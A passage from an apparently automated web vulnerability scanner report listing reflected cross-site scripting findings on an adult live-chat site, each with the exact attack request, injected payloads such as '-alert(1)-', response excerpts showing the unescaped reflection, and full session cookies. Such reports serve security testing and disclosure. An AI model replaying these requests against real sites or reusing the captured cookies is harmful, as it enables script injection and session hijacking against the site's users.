Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

4.522. http://imlive.com/live-sex-chats/happyhour/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/happyhour/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f3c"><a>aec254de933 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/happyhour/?82f3c"><a>aec254de933=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:15 GMT
Connection: close
Content-Length: 22814
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/happyhour/?82f3c"><a>aec254de933=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.523. http://imlive.com/live-sex-chats/happyhour/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/happyhour/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95f8e'-alert(1)-'12b8116e5e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/happyhour/?95f8e'-alert(1)-'12b8116e5e2=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:38 GMT
Connection: close
Content-Length: 22962
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/happyhour.aspx&he=imlive.com&ul=/live-sex-chats/happyhour/?95f8e'-alert(1)-'12b8116e5e2=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.524. http://imlive.com/live-sex-chats/lesbian-couple/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/lesbian-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95de2"><a>dfcf1a79259 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/lesbian-couple/?95de2"><a>dfcf1a79259=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

4.525. http://imlive.com/live-sex-chats/lesbian-couple/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/lesbian-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c06bb'-alert(1)-'229e135fe5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/lesbian-couple/?c06bb'-alert(1)-'229e135fe5b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:07 GMT
Connection: close
Content-Length: 119630
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian-couple/?c06bb'-alert(1)-'229e135fe5b=1&qs=cat=1^roomid=191^c06bb'-alert(1)-'229e135fe5b=1&qs=cat=1^roomid=191^c06bb'-alert(1)-'229e135fe5b=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63
...[SNIP]...

4.526. http://imlive.com/live-sex-chats/lesbian/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/lesbian/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 799a4'-alert(1)-'5a8a05031a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/lesbian/?799a4'-alert(1)-'5a8a05031a3=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:42 GMT
Connection: close
Content-Length: 33699
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian/?799a4'-alert(1)-'5a8a05031a3=1&qs=cat=1^roomid=11^799a4'-alert(1)-'5a8a05031a3=1&qs=cat=1^roomid=11^799a4'-alert(1)-'5a8a05031a3=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

4.527. http://imlive.com/live-sex-chats/lesbian/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/lesbian/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af6d9"><a>bfa76ccfa1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/lesbian/?af6d9"><a>bfa76ccfa1f=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

4.528. http://imlive.com/live-sex-chats/live-sex-video/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/live-sex-video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6088"><a>d342b9399fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/live-sex-video/?e6088"><a>d342b9399fb=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:03 GMT
Connection: close
Content-Length: 25443
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/live-sex-video/?e6088"><a>d342b9399fb=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.529. http://imlive.com/live-sex-chats/live-sex-video/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/live-sex-video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f783'-alert(1)-'ad3501b39a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/live-sex-video/?7f783'-alert(1)-'ad3501b39a0=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:16 GMT
Connection: close
Content-Length: 25590
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/videoslibrary.aspx&he=imlive.com&ul=/live-sex-chats/live-sex-video/?7f783'-alert(1)-'ad3501b39a0=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.530. http://imlive.com/live-sex-chats/nude-chat/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/nude-chat/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acb7a'-alert(1)-'34ec5f17816 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/nude-chat/?acb7a'-alert(1)-'34ec5f17816=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
